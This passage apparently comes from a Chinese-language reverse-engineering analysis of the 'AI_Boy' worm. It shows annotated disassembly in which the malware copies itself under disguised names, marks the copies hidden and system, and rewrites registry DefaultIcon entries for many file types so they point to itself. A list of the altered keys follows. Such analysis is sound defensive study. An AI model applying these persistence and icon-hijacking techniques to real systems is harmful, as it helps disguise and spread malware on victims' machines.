0040230C|.83E8 6B ||sub eax, 6B
0040230F|.50 ||push eax
00402310|.8D85 A8F7FFFF ||lea eax, dword ptr
00402316|.50 ||push eax
00402317|.8D8D A4F6FFFF ||lea ecx, dword ptr
0040231D|.51 ||push ecx
0040231E|.E8 1D170000 ||call 00403A40
00402323|.83C4 0C ||add esp, 0C
00402326|.8D95 A8F7FFFF ||lea edx, dword ptr
0040232C|.52 ||push edx
0040232D|.E8 0E180000 ||call 00403B40
00402332|.83C4 04 ||add esp, 4
00402335|.C68405 39F6FF>||mov byte ptr , 0
0040233D|.8BF4 ||mov esi, esp
0040233F|.8D85 A4F6FFFF ||lea eax, dword ptr
00402345|.50 ||push eax ; /<%s>
00402346|.68 A0E34200 ||push 0042E3A0 ; |Format = "%s AI_Boy.exe"
0040234B|.8D8D 9CF4FFFF ||lea ecx, dword ptr ; |
00402351|.51 ||push ecx ; |s
00402352|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402358|.83C4 0C ||add esp, 0C
0040235B|.3BF4 ||cmp esi, esp
0040235D|.E8 5E180000 ||call 00403BC0
00402362|.8BF4 ||mov esi, esp
00402364|.8D95 A8F7FFFF ||lea edx, dword ptr
0040236A|.52 ||push edx ; /<%s>
0040236B|.68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
00402370|.8D85 A0F5FFFF ||lea eax, dword ptr ; |
00402376|.50 ||push eax ; |s
00402377|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
0040237D|.83C4 0C ||add esp, 0C
00402380|.3BF4 ||cmp esi, esp
00402382|.E8 39180000 ||call 00403BC0
00402387|.8BF4 ||mov esi, esp
00402389|.6A 00 ||push 0 ; /FailIfExists = FALSE
0040238B|.8D8D 9CF4FFFF ||lea ecx, dword ptr ; |
00402391|.51 ||push ecx ; |NewFileName
00402392|.68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402397|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
0040239D|.3BF4 ||cmp esi, esp
0040239F|.E8 1C180000 ||call 00403BC0
004023A4|.8BF4 ||mov esi, esp
004023A6|.6A 00 ||push 0 ; /FailIfExists = FALSE
004023A8|.8D95 A0F5FFFF ||lea edx, dword ptr ; |
004023AE|.52 ||push edx ; |NewFileName
004023AF|.68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
004023B4|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
004023BA|.3BF4 ||cmp esi, esp
004023BC|.E8 FF170000 ||call 00403BC0
004023C1|.8BF4 ||mov esi, esp
004023C3|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004023C5|.8D85 98F3FFFF ||lea eax, dword ptr ; |
004023CB|.50 ||push eax ; |FileName
004023CC|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004023D2|.3BF4 ||cmp esi, esp
004023D4|.E8 E7170000 ||call 00403BC0
004023D9|.8BF4 ||mov esi, esp
004023DB|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004023DD|.8D8D A0F5FFFF ||lea ecx, dword ptr ; |
004023E3|.51 ||push ecx ; |FileName
004023E4|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004023EA|.3BF4 ||cmp esi, esp
004023EC|.E8 CF170000 ||call 00403BC0
004023F1|.8BF4 ||mov esi, esp
004023F3|.68 80000000 ||push 80 ; /FileAttributes = NORMAL
004023F8|.8D95 9CF4FFFF ||lea edx, dword ptr ; |
004023FE|.52 ||push edx ; |FileName
004023FF|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402405|.3BF4 ||cmp esi, esp
00402407|.E8 B4170000 ||call 00403BC0
0040240C|>E9 CC000000 ||jmp 004024DD
00402411|>8D85 DCF8FFFF ||lea eax, dword ptr
00402417|.50 ||push eax
00402418|.E8 23170000 ||call 00403B40
0040241D|.83C4 04 ||add esp, 4
00402420|.83F8 64 ||cmp eax, 64
00402423|.0F87 B4000000 ||ja 004024DD
00402429|.8BF4 ||mov esi, esp
0040242B|.8D8D DCF8FFFF ||lea ecx, dword ptr
00402431|.51 ||push ecx ; /<%s>
00402432|.68 9CE34200 ||push 0042E39C ; |Format = "%s"
00402437|.8D95 A8F7FFFF ||lea edx, dword ptr ; |
0040243D|.52 ||push edx ; |s
0040243E|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402444|.83C4 0C ||add esp, 0C
00402447|.3BF4 ||cmp esi, esp
00402449|.E8 72170000 ||call 00403BC0
0040244E|.8BF4 ||mov esi, esp
00402450|.8D85 DCF8FFFF ||lea eax, dword ptr
00402456|.50 ||push eax ; /<%s>
00402457|.8D8D F8FDFFFF ||lea ecx, dword ptr ; |
0040245D|.51 ||push ecx ; |<%s>
0040245E|.68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
00402463|.8D95 A4F6FFFF ||lea edx, dword ptr ; |
00402469|.52 ||push edx ; |s
0040246A|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402470|.83C4 10 ||add esp, 10
00402473|.3BF4 ||cmp esi, esp
00402475|.E8 46170000 ||call 00403BC0
0040247A|.8D85 A8F7FFFF ||lea eax, dword ptr
00402480|.50 ||push eax
00402481|.E8 BA160000 ||call 00403B40
00402486|.83C4 04 ||add esp, 4
00402489|.0FBE8C05 A5F7>||movsx ecx, byte ptr
00402491|.83F9 65 ||cmp ecx, 65
00402494|.75 47 ||jnz short 004024DD
00402496|.8D95 A8F7FFFF ||lea edx, dword ptr
0040249C|.52 ||push edx
0040249D|.E8 9E160000 ||call 00403B40
004024A2|.83C4 04 ||add esp, 4
004024A5|.0FBE8405 A6F7>||movsx eax, byte ptr
004024AD|.83F8 78 ||cmp eax, 78
004024B0|.75 2B ||jnz short 004024DD
004024B2|.8D8D A8F7FFFF ||lea ecx, dword ptr
004024B8|.51 ||push ecx
004024B9|.E8 82160000 ||call 00403B40
004024BE|.83C4 04 ||add esp, 4
004024C1|.0FBE9405 A7F7>||movsx edx, byte ptr
004024C9|.83FA 65 ||cmp edx, 65
004024CC|.75 0F ||jnz short 004024DD
004024CE|.8D85 A4F6FFFF ||lea eax, dword ptr
004024D4|.50 ||push eax
004024D5|.E8 30EBFFFF ||call 0040100A
004024DA|.83C4 04 ||add esp, 4
004024DD|>^ E9 56FBFFFF |\jmp 00402038
004024E2|>8BF4 |mov esi, esp
004024E4|.8B8D ACF8FFFF |mov ecx, dword ptr
004024EA|.51 |push ecx ; /hSearch
004024EB|.FF15 C0834300 |call dword ptr [<&KERNEL32.FindClose>; \FindClose
004024F1|.3BF4 |cmp esi, esp
004024F3|.E8 C8160000 |call 00403BC0
004024F8|.^ E9 83FAFFFF \jmp 00401F80
004024FD|>5F pop edi
004024FE|.5E pop esi
004024FF|.5B pop ebx
00402500|.81C4 A80C0000 add esp, 0CA8
00402506|.3BEC cmp ebp, esp
00402508|.E8 B3160000 call 00403BC0
0040250D|.8BE5 mov esp, ebp
0040250F|.5D pop ebp
00402510\.C3 retn
7.修改注册表,修改文件默认图标
00403430/> \55 push ebp
00403431|.8BEC mov ebp, esp
00403433|.81EC 60050000 sub esp, 560
00403439|.53 push ebx
0040343A|.56 push esi
0040343B|.57 push edi
0040343C|.8DBD A0FAFFFF lea edi, dword ptr
00403442|.B9 58010000 mov ecx, 158
00403447|.B8 CCCCCCCC mov eax, CCCCCCCC
0040344C|.F3:AB rep stos dword ptr es:
0040344E|.8BF4 mov esi, esp
00403450|.68 341B4300 push 00431B34 ; /<%s> = "C:\WINDOWS\system\svchost.exe"
00403455|.68 84E74200 push 0042E784 ; |Format = "%s,0"
0040345A|.8D85 F4FDFFFF lea eax, dword ptr ; |
00403460|.50 push eax ; |s
00403461|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00403467|.83C4 0C add esp, 0C
0040346A|.3BF4 cmp esi, esp
0040346C|.E8 4F070000 call 00403BC0
00403471|.8BF4 mov esi, esp
00403473|.8B4D 08 mov ecx, dword ptr
00403476|.51 push ecx ; /<%s>
00403477|.68 68E74200 push 0042E768 ; |Format = "CLSID\%s\DefaultIcon"
0040347C|.8D95 F8FEFFFF lea edx, dword ptr ; |
00403482|.52 push edx ; |s
00403483|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00403489|.83C4 0C add esp, 0C
0040348C|.3BF4 cmp esi, esp
0040348E|.E8 2D070000 call 00403BC0
00403493|.8BF4 mov esi, esp
00403495|.8D45 FC lea eax, dword ptr
00403498|.50 push eax ; /pHandle
00403499|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
0040349E|.6A 00 push 0 ; |Reserved = 0
004034A0|.8D8D F8FEFFFF lea ecx, dword ptr ; |
004034A6|.51 push ecx ; |Subkey
004034A7|.68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
004034AC|.FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
004034B2|.3BF4 cmp esi, esp
004034B4|.E8 07070000 call 00403BC0
004034B9|.8D95 F4FDFFFF lea edx, dword ptr
004034BF|.52 push edx
004034C0|.E8 7B060000 call 00403B40
004034C5|.83C4 04 add esp, 4
004034C8|.8BF4 mov esi, esp
004034CA|.50 push eax ; /BufSize
004034CB|.8D85 F4FDFFFF lea eax, dword ptr ; |
004034D1|.50 push eax ; |Buffer
004034D2|.6A 02 push 2 ; |ValueType = REG_EXPAND_SZ
004034D4|.6A 00 push 0 ; |Reserved = 0
004034D6|.6A 00 push 0 ; |ValueName = NULL
004034D8|.8B4D FC mov ecx, dword ptr ; |
004034DB|.51 push ecx ; |hKey
004034DC|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \修改注册表破坏文件图标指向C:\WINDOWS\system\svchost.exe
004034E2|.3BF4 cmp esi, esp
004034E4|.E8 D7060000 call 00403BC0
004034E9|.8BF4 mov esi, esp
004034EB|.8B55 FC mov edx, dword ptr
004034EE|.52 push edx ; /hKey
004034EF|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
004034F5|.3BF4 cmp esi, esp
004034F7|.E8 C4060000 call 00403BC0
004034FC|.8BF4 mov esi, esp
004034FE|.8B45 08 mov eax, dword ptr
00403501|.50 push eax ; /<%s>
00403502|.68 5CE74200 push 0042E75C ; |Format = "CLSID\%s"
00403507|.8D8D E4FBFFFF lea ecx, dword ptr ; |
0040350D|.51 push ecx ; |s
0040350E|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00403514|.83C4 0C add esp, 0C
00403517|.3BF4 cmp esi, esp
00403519|.E8 A2060000 call 00403BC0
0040351E|.8BF4 mov esi, esp
00403520|.8D95 F0FDFFFF lea edx, dword ptr
00403526|.52 push edx ; /pHandle
00403527|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
0040352C|.6A 00 push 0 ; |Reserved = 0
0040352E|.8D85 E4FBFFFF lea eax, dword ptr ; |
00403534|.50 push eax ; |Subkey
00403535|.68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
0040353A|.FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00403540|.3BF4 cmp esi, esp
00403542|.E8 79060000 call 00403BC0
00403547|.8BF4 mov esi, esp
00403549|.8D8D E8FCFFFF lea ecx, dword ptr
0040354F|.51 push ecx ; /pBufSize
00403550|.8D95 ECFCFFFF lea edx, dword ptr ; |
00403556|.52 push edx ; |Buffer
00403557|.6A 00 push 0 ; |pValueType = NULL
00403559|.6A 00 push 0 ; |Reserved = NULL
0040355B|.6A 00 push 0 ; |ValueName = NULL
0040355D|.8B85 F0FDFFFF mov eax, dword ptr ; |
00403563|.50 push eax ; |hKey
00403564|.FF15 7C834300 call dword ptr [<&ADVAPI32.RegQueryVa>; \查询其余文件格式
0040356A|.3BF4 cmp esi, esp
0040356C|.E8 4F060000 call 00403BC0
00403571|.8BF4 mov esi, esp
00403573|.8D8D ECFCFFFF lea ecx, dword ptr
00403579|.51 push ecx ; /<%s>
0040357A|.68 50E74200 push 0042E750 ; |Format = "%s.AI_Boy"
0040357F|.8D95 E0FAFFFF lea edx, dword ptr ; |
00403585|.52 push edx ; |s
00403586|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
0040358C|.83C4 0C add esp, 0C
0040358F|.3BF4 cmp esi, esp
00403591|.E8 2A060000 call 00403BC0
00403596|.8D85 E0FAFFFF lea eax, dword ptr
0040359C|.50 push eax
0040359D|.E8 9E050000 call 00403B40
004035A2|.83C4 04 add esp, 4
004035A5|.8BF4 mov esi, esp
004035A7|.50 push eax ; /BufSize
004035A8|.8D8D E0FAFFFF lea ecx, dword ptr ; |
004035AE|.51 push ecx ; |Buffer
004035AF|.6A 01 push 1 ; |ValueType = REG_SZ
004035B1|.6A 00 push 0 ; |Reserved = 0
004035B3|.6A 00 push 0 ; |ValueName = NULL
004035B5|.8B95 F0FDFFFF mov edx, dword ptr ; |
004035BB|.52 push edx ; |hKey
004035BC|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \相同方法操作
004035C2|.3BF4 cmp esi, esp
004035C4|.E8 F7050000 call 00403BC0
004035C9|.8BF4 mov esi, esp
004035CB|.8B85 F0FDFFFF mov eax, dword ptr
004035D1|.50 push eax ; /hKey
004035D2|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
0040322C|> \68 08E64200 push 0042E608 ;ASCII "{645FF040-5081-101B-9F08-00AA002F954E}"
00403231|.E8 15DEFFFF call 0040104B
00403236|.83C4 04 add esp, 4
00403239|.68 D8E54200 push 0042E5D8 ;ASCII "{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
0040323E|.E8 08DEFFFF call 0040104B
00403243|.83C4 04 add esp, 4
00403246|.68 A8E54200 push 0042E5A8 ;ASCII "{450D8FbA-AD25-11D0-98A8-0800361B1103}"
0040324B|.E8 FBDDFFFF call 0040104B
00403250|.83C4 04 add esp, 4
00403253|.68 78E54200 push 0042E578 ;ASCII "{208D2C60-3AEA-1069-A2D7-08002B30309D}"
00403258|.E8 EEDDFFFF call 0040104B
0040325D|.83C4 04 add esp, 4
00403260|.68 48E54200 push 0042E548 ;ASCII "{871C5380-42A0-1069-A2EA-08002B30309D}"
00403265|.E8 E1DDFFFF call 0040104B
具体修改了以下:
HKLM\SOFTWARE\Classes\batfile\DefaultIcon
HKLM\SOFTWARE\Classes\cmdfile\DefaultIcon
HKLM\SOFTWARE\Classes\comfile\DefaultIcon
HKLM\SOFTWARE\Classes\dllfile\DefaultIcon
HKLM\SOFTWARE\Classes\inffile\DefaultIcon
HKLM\SOFTWARE\Classes\regfile\DefaultIcon
HKLM\SOFTWARE\Classes\txtfile\DefaultIcon
HKLM\SOFTWARE\Classes\chm.file\DefaultIcon
HKLM\SOFTWARE\Classes\Excel.CSV\DefaultIcon
HKLM\SOFTWARE\Classes\exefile\DefaultIcon
HKLM\SOFTWARE\Classes\icofile\DefaultIcon
HKLM\SOFTWARE\Classes\jpegfile\DefaultIcon
HKLM\SOFTWARE\Classes\Paint.Picture\DefaultIcon
HKLM\SOFTWARE\Classes\PowerPoint.Show.8\DefaultIcon
HKLM\SOFTWARE\Classes\SoundRec\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.acc\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.mp4\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rm\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rmvb\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon
HKLM\SOFTWARE\Classes\icofile\DefaultIcon
HKLM\SOFTWARE\Classes\jpegfile\DefaultIcon
HKLM\SOFTWARE\Classes\Paint.Picture\DefaultIcon
HKLM\SOFTWARE\Classes\PowerPoint.Show.8\DefaultIcon
HKLM\SOFTWARE\Classes\SoundRec\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.acc\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.mp4\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rm\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rmvb\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon
HKLM\SOFTWARE\Classes\Word.Document.8\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\DefaultIcon